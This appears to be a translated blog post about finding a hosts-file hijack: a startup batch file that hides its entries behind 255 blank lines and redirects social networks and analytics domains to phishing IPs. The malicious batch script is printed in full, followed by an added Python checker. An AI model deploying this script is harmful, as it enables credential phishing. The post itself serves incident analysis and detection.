An easy intrusion, or the fight against a simple virus

Exciting events on your computer tend to unfold quite unexpectedly and, as a rule, at the most inopportune moment. It all starts simply: you go to your favorite site or social network and find something unusual...

That is what happened with my computer. I go to a site and see an indecent picture (an advertising banner) in the left corner. Two thoughts flashed through my head:
  • my browser is infected
  • the site is infected

After wandering around several other sites and not seeing this banner anywhere, I concluded that the site was indeed infected. Since this was the site of a fairly large company, I called their tech support. They listened, thanked me for my vigilance, but in the course of the conversation said that the banner did not appear for them in any browser.

Site analysis

I started examining the site and saw the following line in the Yandex.Metrica code:


This is the line that shows the banner. It is not entirely clear how this is done within the tag, but it is clear that the link to the image is a phishing one.

Hosts file

We are sent to the hosts file (%windir%\system32\drivers\etc\hosts).
And here I made a serious mistake: I opened it, looked, everything seemed in order, closed it. I did not pay attention to the scroll bar that had appeared.

Autoload

We go to startup (Start -> Run -> msconfig) and find the file start.bat with the following contents:

FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt


It becomes clear that the first line of the batch file appends 255 empty lines to hosts. That is why, when I looked at hosts, I did not see anything: one had to scroll to the very end to notice the modification.

Thus, the banner appeared on every site that ran Google Analytics or Yandex.Metrica. And every social network was hooked up to a phishing site, where you could easily hand over access to your page to the "enemy".
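As an added example (not part of the original post), a short Python audit of a hosts file in the state described above: it measures the run of empty lines that hid the modification, and lists the hostnames sunk to loopback (a block list) and those sent to another address (a redirect). The sample hosts content and the watched-domain list are constructed for the example, and the addresses are documentation-range placeholders rather than the ones on the page.

```python
import ipaddress

# Constructed sample of a hosts file after the trick described above: the normal
# entries, a run of 255 empty lines, then the redirects appended at the very end.
# Addresses are from the RFC 5737 documentation range, not the ones on the page.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    "127.0.0.1 localhost\n"
    + "\n" * 255
    + "127.0.0.1 obhodilka.ru raskruty.ru\n"
    "203.0.113.7 vk.com m.vk.com odnoklassniki.ru\n"
    "203.0.113.8 mc.yandex.ru www.google-analytics.com\n"
)

# Domains that should never be resolved via hosts (an assumption for this
# example; extend with whatever your environment treats as DNS-only).
WATCHED = {"vk.com", "m.vk.com", "odnoklassniki.ru", "mc.yandex.ru",
           "www.google-analytics.com"}


def audit_hosts(text, watched=WATCHED, pad_threshold=20):
    """Scan hosts-file text and report: the longest run of empty or
    comment-only lines (the padding trick), hostnames sunk to loopback,
    and hostnames redirected to a real address, marking watched ones."""
    report = {"max_blank_run": 0, "blocked": [], "redirects": [], "watched_hits": []}
    run = 0
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            run += 1
            report["max_blank_run"] = max(report["max_blank_run"], run)
            continue
        run = 0
        addr_str, *hosts = line.split()
        try:
            addr = ipaddress.ip_address(addr_str)
        except ValueError:
            continue                            # malformed line, not an entry
        for host in (h.lower() for h in hosts):
            if addr.is_loopback or addr.is_unspecified:
                if host != "localhost":
                    report["blocked"].append(host)
            else:
                report["redirects"].append((host, addr_str))
                if host in watched:
                    report["watched_hits"].append(host)
    report["padding_suspicious"] = report["max_blank_run"] >= pad_threshold
    return report


if __name__ == "__main__":
    for key, value in audit_hosts(SAMPLE_HOSTS).items():
        print(f"{key}: {value}")
```

On a live machine, feed the function the contents of %windir%\system32\drivers\etc\hosts; a large blank run together with non-loopback entries for well-known domains is the signature this post describes.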

It was enough to remove the batch file from startup and clean the hosts file, and everything fell back into place. How the pest got onto the computer remained a mystery.

Conclusion

In this whole story, the following remains surprising:
  • Kaspersky Anti-Virus was installed on the computer, and it showed no sign of reacting to the modification of the hosts file, the addition of a batch file to startup, or the appearance of the banner (even after a full scan).
  • Windows 7 quite calmly allowed start.bat to run at every boot.
